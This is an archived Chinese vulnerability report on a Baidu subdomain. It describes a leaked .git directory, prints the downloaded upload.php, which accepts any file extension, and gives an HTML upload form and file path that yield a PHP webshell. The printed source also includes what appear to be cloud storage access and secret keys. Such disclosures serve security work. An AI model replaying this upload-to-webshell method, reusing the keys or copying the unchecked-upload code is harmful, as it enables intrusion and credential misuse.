乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-15: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-29: 细节向核心白帽子及相关领域专家公开 2015-06-08: 细节向普通白帽子公开 2015-06-18: 细节向实习白帽子公开 2015-07-03: 细节向公众公开
杀器在手,天下我有!
http://hybrid.baidu.com/.git/config一个git信息泄露,可以下载代码;
➜ hybrid.baidu.com git:(master) ✗ ls -lhtotal 0drwxr-xr-x 22 tank staff 748B 5 15 12:46 generaldrwxr-xr-x 20 tank staff 680B 5 15 13:09 wenku
里面有个upload.php,看看
<?php/** * 上传 */error_reporting(0);session_start();$allow_sep = "1"; //限制重复上传时间,防止短时间刷新本文件重复上传,以秒为单位if (isset($_SESSION['post_sep'])){if (time() - $_SESSION['post_sep'] < $allow_sep){exit('wait 1 second');}else{$_SESSION['post_sep'] = time();}}else{$_SESSION['post_sep'] = time();}date_default_timezone_set('Asia/Shanghai');if($_SERVER['REQUEST_URI']) {$temp = urldecode($_SERVER['REQUEST_URI']);if(strpos($temp, '<') !== false || strpos($temp, '>') !== false || strpos($temp, '(') !== false || strpos($temp, '"') !== false) {exit('Request Bad url');}}if($_FILES['Filedata']['size'] != 0){if(isset($_FILES['Filedata']) && is_array($_FILES['Filedata'])) {$attach = $_FILES['Filedata'];}$max_upload_size = 10485760; //单位字节$old_attachName = mb_detect_encoding($attach['name'])=='UTF-8'?$attach['name']:iconv('gbk',"utf-8",$attach['name']);$attach['ext'] = explode('.', $attach['name']);if (($length = count($attach['ext'])) > 1) {$ext = strtolower($attach['ext'][$length - 1]);}$year = date("Y");$month = date("m");$day = date("d");$fnamehash = md5(uniqid(microtime()));// fnamehash变量为当前时间的MD5散列,重命名附件名$new_dir_name = $year.'-'.$month.'-'.$day.'-'.$fnamehash;$object = '/www'.'.'.$ext;if(!file_exists(dirname(__FILE__).'/temp/'.$new_dir_name)){ mkdir(dirname(__FILE__).'/temp/'.$new_dir_name, 0777);}$path =$attach['tmp_name'];$opt=array("filename"=>$old_attachName,"acl"=>"public-read"); move_uploaded_file($path, dirname(__FILE__). "/temp/".$new_dir_name . $object);//echo "http://10.42.82.59/zhaojie/temp".$object;echo dirname(__FILE__)."/temp/".$new_dir_name . $object;return;//require_once('./bcs/bcs.class.php');/*$host = 'bcs-sandbox.baidu.com'; //offline$ak = 'J78GkSfzDt1VmNlvy2Erg5uErXofKbTXZa9';$sk = '6xvpoHR2tCpkHXGBHLtfzPqRq0oGamyWa';$bucket = 'auto-pack-bucket-nanjing';$baidu_bcs = new BaiduBCS ( $ak, $sk, $host );if ($attach['size'] > $max_upload_size) { //@unlink($attach['tmp_name']); echo 'max limited';}$response = $baidu_bcs->create_object ( $bucket, $object, $path ,$opt); //上传附件if (! $response->isOK ()) die ( "upload object failed." );$opt = array ();$opt ["time"] = time () + 3600; //可选,链接生效时间为linux时间戳向后一小时 */echo $baidu_bcs->generate_get_object_url ( $bucket, $object, $opt );}?>
getshell
<html><body><form action="http://hybrid.baidu.com/wenku/upload.php" method="post"enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="Filedata" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form></body></html>
http://hybrid.baidu.com/wenku/temp/2015-05-15-e876c4f4056327c58fa22e467e8e5d7f/www.php
git
危害等级:高
漏洞Rank:20
确认时间:2015-05-19 13:43
感谢
暂无